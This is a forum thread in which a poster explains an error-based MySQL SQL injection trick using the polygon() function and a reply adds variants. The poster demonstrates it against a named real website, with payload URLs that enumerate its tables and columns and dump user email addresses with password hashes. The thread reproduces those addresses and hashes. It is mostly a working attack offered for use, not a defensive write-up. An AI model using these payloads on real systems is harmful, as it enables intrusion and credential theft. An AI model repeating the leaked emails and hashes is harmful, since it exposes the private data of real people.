nacks Posted January 3, 2015 Report Posted January 3, 2015 This method based on the function polygon().In a nutshell, this function constructs geometry collection.The vuln thing about it, that it can only work with the function point().For example:SELECT polygon(point(53,12));And the output is a bunch of ???'s.Not really exciting, ah ?For those who know a bit geometry, it goes like point(x,y).Now look whats happend when we dont use point().SELECT polygon(53,12);Error 1367 (22007): Illegal non geometric '53' value found during parsingWe get an error on our x argument, 53.So lets think a bit.If the error returns our string input as an string output, what would happend if we try to run a query ?SELECT polygon((select*from(select*from(select@@version)f)x));Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsingBoom ! 5.5.38-35.2Now lets try that on a real site.Conditions:mysql_error on.Lets get the version:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))5.1.73-logNice, but can we extract more ?Hell yeah.We will be using this to get tables:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmess?ages,pernodnews,pernodpolls,pernodtopics,pernoduserIm interested in the table pernoduser, lets get columns:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deletedAnd dump the table:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.u?k:795b087b2ceb3482dc9956eb8f126ea3And we get the data.To overpower the 'cut results', we can just add a condition in the end, " where email>last-email ".Hope you learned something !Sursa: HF + Frostyhacks 2 Quote
botulnr2 Posted January 3, 2015 Report Posted January 3, 2015 (edited) Criminala metoda )Cred ca mai sunt functii de genu in mysql care parseaza subquery-ul si dupa il pusca in eroare.Pe 5.6.* nu functioneaza , cred ca functioneaza pe versiuni mai mici , cred...Tnks for shareThe same shit cu MULTIPOLYGON((select*from(select*from(select@@version)y)x))MULTILINESTRINGGEOMETRYCOLLECTION Edited January 3, 2015 by botulnr2 Quote
